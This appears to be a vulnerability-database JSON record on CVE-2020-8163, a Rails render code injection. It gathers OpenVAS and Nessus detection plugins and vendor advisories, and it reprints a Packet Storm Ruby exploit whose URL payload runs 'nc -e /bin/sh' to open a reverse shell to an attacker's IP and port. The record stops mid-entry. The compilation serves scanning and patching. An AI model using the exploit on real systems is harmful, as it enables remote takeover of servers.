The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.
{"openvas": [{"lastseen": "2020-07-21T20:10:01", "description": "Ruby on Rails is prone to a remote code execution (RCE) vulnerability.", "cvss3": {}, "published": "2020-07-06T00:00:00", "type": "openvas", "title": "Ruby on Rails < 5.0.1 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310113718", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113718", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113718\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-06 10:24:47 +0000 (Mon, 06 Jul 2020)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-8163\");\n\n script_name(\"Ruby on Rails < 5.0.1 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Ruby on Rails is prone to a remote code execution (RCE) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An attacker may exploit this vulnerability by\n sending a specially crafted 'render' call.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker\n to execute arbitrary code on the target machine.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails through version 5.0.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.0.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/304805\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"5.0.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.0.1\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:10:01", "description": "Ruby on Rails is prone to a remote code execution (RCE) vulnerability.", "cvss3": {}, "published": "2020-07-06T00:00:00", "type": "openvas", "title": "Ruby on Rails < 5.0.1 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310113717", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113717", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113717\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-06 10:24:47 +0000 (Mon, 06 Jul 2020)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-8163\");\n\n script_name(\"Ruby on Rails < 5.0.1 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Ruby on Rails is prone to a remote code execution (RCE) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An attacker may exploit this vulnerability by\n sending a specially crafted 'render' call.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker\n to execute arbitrary code on the target machine.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails through version 5.0.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.0.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/304805\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"5.0.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.0.1\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:05:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-07-21T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for rails (DLA-2282-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165", "CVE-2020-8163", "CVE-2020-8164"], "modified": "2020-07-21T00:00:00", "id": "OPENVAS:1361412562310892282", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892282", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892282\");\n script_version(\"2020-07-21T03:01:31+0000\");\n script_cve_id(\"CVE-2020-8163\", \"CVE-2020-8164\", \"CVE-2020-8165\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-21 10:01:45 +0000 (Tue, 21 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-21 03:01:31 +0000 (Tue, 21 Jul 2020)\");\n script_name(\"Debian LTS: Security Advisory for rails (DLA-2282-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2282-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rails'\n package(s) announced via the DLA-2282-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8163\n\nA code injection vulnerability in Rails would allow an attacker\nwho controlled the `locals` argument of a `render` call to perform\na RCE.\n\nCVE-2020-8164\n\nA deserialization of untrusted data vulnerability exists in rails\nwhich can allow an attacker to supply information can be\ninadvertently leaked from Strong Parameters.\n\nCVE-2020-8165\n\nA deserialization of untrusted data vulnernerability exists in\nrails that can allow an attacker to unmarshal user-provided objects\nin MemCacheStore and RedisCacheStore potentially resulting in an\nRCE.\");\n\n script_tag(name:\"affected\", value:\"'rails' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activejob\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-07-28T17:51:18", "description": "", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "packetstorm", "title": "Ruby On Rails 5.0.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-27T00:00:00", "id": "PACKETSTORM:158604", "href": "https://packetstormsecurity.com/files/158604/Ruby-On-Rails-5.0.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Rails 5.0.1 - Remote Code Execution \n# Date: 2020-07-19 \n# Exploit Author: Lucas Amorim \n# Vendor Homepage: www.rubyonrails.org \n# Software Link: www.rubyonrails.org \n# Version: Rails < 5.0.1 \n# Tested on: Linux/OSx \n# CVE : CVE-2020-8163 \n# More information: https://github.com/sh286/CVE-2020-8163 \n \n#!/usr/bin/ruby \n \nrequire 'net/http' \n \ndef header \nputs \"[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\\n\" \nputs \"[*] - Author: Lucas Amorim lucas@lucasamorim.ca\" \nputs \"[*] - Usage: \\n\" \nputs \"ruby exploit.rb <url> <ip> <port>\" \nend \nif ARGV.length < 3 \nheader \nexit(-1) \nend \n \nurl = ARGV[0] \nip = ARGV[1] \nport = ARGV[2] \n \nputs \"[*] Sending payload to #{url}\" \nuri = URI(url+\"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23\") \nNet::HTTP.get(uri) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158604/ruby501-exec.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2021-07-29T16:40:27", "description": "Added: 07/29/2020 \nCVE: [CVE-2020-8163](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8163>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nRails applications that allow users to control the names of local variable are affected by a vulnerability that could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nUpgrade to Ruby on Rails 5.0.1 or higher, or configure the application not to allow users to control the names of local variables. \n\n### References\n\n<https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0?pli=1> \n\n\n### Limitations\n\nThe path to a web application resource which allows users to control the names of local variables must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-29T00:00:00", "type": "saint", "title": "Ruby on Rails local names command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-29T00:00:00", "id": "SAINT:7385D23ED87A54FB8E74EC22B5CCE310", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_local_names", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:36:57", "description": "Added: 07/29/2020 \nCVE: [CVE-2020-8163](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8163>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nRails applications that allow users to control the names of local variable are affected by a vulnerability that could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nUpgrade to Ruby on Rails 5.0.1 or higher, or configure the application not to allow users to control the names of local variables. \n\n### References\n\n<https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0?pli=1> \n\n\n### Limitations\n\nThe path to a web application resource which allows users to control the names of local variables must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-29T00:00:00", "type": "saint", "title": "Ruby on Rails local names command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-29T00:00:00", "id": "SAINT:8B3BDA4D3A90B157AC18334165463CD3", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_local_names", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 07/29/2020 \nCVE: [CVE-2020-8163](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8163>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nRails applications that allow users to control the names of local variable are affected by a vulnerability that could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nUpgrade to Ruby on Rails 5.0.1 or higher, or configure the application not to allow users to control the names of local variables. \n\n### References\n\n<https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0?pli=1> \n\n\n### Limitations\n\nThe path to a web application resource which allows users to control the names of local variables must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-29T00:00:00", "type": "saint", "title": "Ruby on Rails local names command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-29T00:00:00", "id": "SAINT:FF802506CE71C280DB334599267E7500", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_local_names", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-16T15:34:54", "description": "Ruby on Rails blog :\n\nDue to an unfortunate oversight, Rails 4.2.11.2 has a missing constant error. To address this Rails 4.2.11.3 has been released.\n\nThe original announcement for CVE-2020-8163 has a follow-up message with an updated patch if you're unable to use the gems.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "FreeBSD : Rails -- remote code execution vulnerability (ce6db19b-976e-11ea-93c4-08002728f74c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8163"], "modified": "2020-08-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionview4", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CE6DB19B976E11EA93C408002728F74C.NASL", "href": "https://www.tenable.com/plugins/nessus/136689", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136689);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\"CVE-2020-8163\");\n\n script_name(english:\"FreeBSD : Rails -- remote code execution vulnerability (ce6db19b-976e-11ea-93c4-08002728f74c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ruby on Rails blog :\n\nDue to an unfortunate oversight, Rails 4.2.11.2 has a missing constant\nerror. To address this Rails 4.2.11.3 has been released.\n\nThe original announcement for CVE-2020-8163 has a follow-up message\nwith an updated patch if you're unable to use the gems.\"\n );\n # https://weblog.rubyonrails.org/2020/5/16/rails-4-2-11-3-has-been-released/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32a9a2fc\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/hWuKcHyoKh0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00df6893\"\n );\n # https://vuxml.freebsd.org/freebsd/ce6db19b-976e-11ea-93c4-08002728f74c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5a540702\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8163\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview4<4.2.11.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-01-14T12:33:44", "description": "There is a code injection vulnerability in versions of Rails prior to 4.2.11.3 and 5.x prior to 5.0.1 that would allow an attacker who controlled the \"locals\" argument of a \"render\" call to perform a Remote Code Execution.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-12T00:00:00", "type": "nessus", "title": "Rails < 4.2.11.3 / 5.x < 5.0.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8163"], "modified": "2021-09-07T00:00:00", "cpe": ["cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112720", "href": "https://www.tenable.com/plugins/was/112720", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T15:39:35", "description": "Multiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based framework geared for web application development, which could lead to remote code execution and untrusted user input usage, depending on the application.\n\nCVE-2020-8163\n\nA code injection vulnerability in Rails would allow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.\n\nCVE-2020-8164\n\nA deserialization of untrusted data vulnerability exists in rails which can allow an attacker to supply information can be inadvertently leaked from Strong Parameters.\n\nCVE-2020-8165\n\nA deserialization of untrusted data vulnernerability exists in rails that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.\n\nFor Debian 9 stretch, these problems have been fixed in version 2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to its security tracker page at: https://security-tracker.debian.org/tracker/rails\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-21T00:00:00", "type": 